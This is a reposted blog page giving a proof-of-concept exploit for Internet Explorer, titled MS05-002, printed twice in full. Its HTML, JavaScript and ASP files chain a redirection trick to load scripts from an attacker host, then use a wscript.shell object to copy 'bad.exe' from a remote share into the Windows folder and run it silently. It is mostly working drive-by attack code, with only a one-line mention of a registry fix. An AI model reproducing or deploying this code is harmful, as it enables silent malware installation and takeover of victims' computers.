Microsoft Internet Explorer .ANI Files Handling Exploit (MS05-002)
2005-04-10 02:13
615 查看
Proof of Concept Exploit by Ferruh Mavituna
Solution : The IEFix.reg registry file will protect you from this new variant/exploit
----------------------------------------------------- default.htm -------------------------------------------------------
<html>
<body>
<img src="cc.exe" width=0 height=0 style=display:none>
<script language="Javascript">
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-1000/;dialogLeft:-1000/;dialogHeight:1/;dialogWidth:1/;").
location="vbscript:/"<SCRIPT SRC='http://IPADDRESS/shellscript_loader.js'><//script>/"";
}
</script>
<script language="javascript">
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.asp" style=display:none;></IFRAME>');
</script>
</body>
</html>
--------------------------------------------------------- md.htm ---------------------------------------------------------
<SCRIPT language="javascript">
window.returnValue = window.dialogArguments;
function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}
CheckStatus();
</SCRIPT>
--------------------------------------------------- shellscript_loader.js ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://IPADDRESS/shellscript.js'><//SCRIPT>");
}
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);
------------------------------------------------------- shellscript.js -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER>
var rF="////////IPADDRESS////NULLSHAREDFOLDER////bad.exe";var wF="%windir%////_tmp.exe";var
o=new ActiveXObject("wscript.shell");var e="%comspec% /c copy "+rF+" "+wF;var err=o.Run(e,0,true);if(err==0)
o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS//Web//TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
--------------------------------------------------------- redir.asp ----------------------------------------------------------
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next
Response.Status = "302 Found"
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>
Solution : The IEFix.reg registry file will protect you from this new variant/exploit
----------------------------------------------------- default.htm -------------------------------------------------------
<html>
<body>
<img src="cc.exe" width=0 height=0 style=display:none>
<script language="Javascript">
function InjectedDuringRedirection(){
showModalDialog('md.htm',window,"dialogTop:-1000/;dialogLeft:-1000/;dialogHeight:1/;dialogWidth:1/;").
location="vbscript:/"<SCRIPT SRC='http://IPADDRESS/shellscript_loader.js'><//script>/"";
}
</script>
<script language="javascript">
setTimeout("myiframe.execScript(InjectedDuringRedirection.toString())",100);
setTimeout("myiframe.execScript('InjectedDuringRedirection()') ",101);
document.write('<IFRAME ID=myiframe NAME=myiframe SRC="redir.asp" style=display:none;></IFRAME>');
</script>
</body>
</html>
--------------------------------------------------------- md.htm ---------------------------------------------------------
<SCRIPT language="javascript">
window.returnValue = window.dialogArguments;
function CheckStatus(){
try{tempVar=window.dialogArguments.location.href;}catch(e){window.close();}
setTimeout("CheckStatus()",100);
}
CheckStatus();
</SCRIPT>
--------------------------------------------------- shellscript_loader.js ---------------------------------------------------
function getRealShell() {
myiframe.document.write("<SCRIPT SRC='http://IPADDRESS/shellscript.js'><//SCRIPT>");
}
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);
------------------------------------------------------- shellscript.js -------------------------------------------------------
function injectIt() {
document.frames[0].document.body.insertAdjacentHTML('afterBegin','injected<script language="JScript" DEFER>
var rF="////////IPADDRESS////NULLSHAREDFOLDER////bad.exe";var wF="%windir%////_tmp.exe";var
o=new ActiveXObject("wscript.shell");var e="%comspec% /c copy "+rF+" "+wF;var err=o.Run(e,0,true);if(err==0)
o.Run(wF,0,false);</script>');
}
document.write('<iframe src="shell:WINDOWS//Web//TIP.HTM"></iframe>');
setTimeout("injectIt()", 1000);
--------------------------------------------------------- redir.asp ----------------------------------------------------------
<%
Response.Expires = 1
Response.Expiresabsolute = Now() - 1
Response.AddHeader "pragma","no-cache"
Response.AddHeader "cache-control","private"
Response.CacheControl = "no-cache"
For x = 1 to 500000 'Time
z = z + 10
Next
Response.Status = "302 Found"
Response.AddHeader "Content-Length", "4"
Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
%>
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 无法开始调试。无法找到Microsoft Internet Explorer
- Internet Explorer VML Buffer Overflow Download Exec Exploit (0day)
- Microsoft Internet Explorer 多个不明细节远程代码执行漏洞
- Dynamics CRM2016 Supported versions of Internet Explorer and Microsoft Edge
- MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit
- Microsoft Internet Explorer cookie设置帮助
- Microsoft Internet Explorer本地文件探测漏洞
- Microsoft Internet Explorer SP2远程任意命令执行漏洞
- Microsoft Internet Explorer遇到问题需要关闭……
- MS09-002 Internet Exploere 7.0 Exploit
- Microsoft Internet Explorer 远程代码执行漏洞(CVE-2013-3186)(MS13-059)
- 用IE调试ActiveX控件的相关设置(无法启动调试信息,找不到Microsoft Internet Explorer的解决方法)
- Microsoft Internet Explorer 信息泄露漏洞
- Dynamics CRM2016 Supported versions of Internet Explorer and Microsoft Edge
- VS2005出现"无法开始调试.找不到Microsoft Internet Explorer"的解决方法
- 用IE调试ActiveX控件的相关设置(无法启动调试信息,找不到Microsoft Internet Explorer的解决方法)
- 解决“无法开始调试。无法找到Microsoft Internet Explorer”错误
- 解决IE经常出现“Microsoft Internet Explorer遇到问题需要关闭……”的信息提示
- VS2008 调试Web网站,出现"找不到Microsoft Internet Explorer"的解决方法
- Microsoft Internet Explorer 数字错误漏洞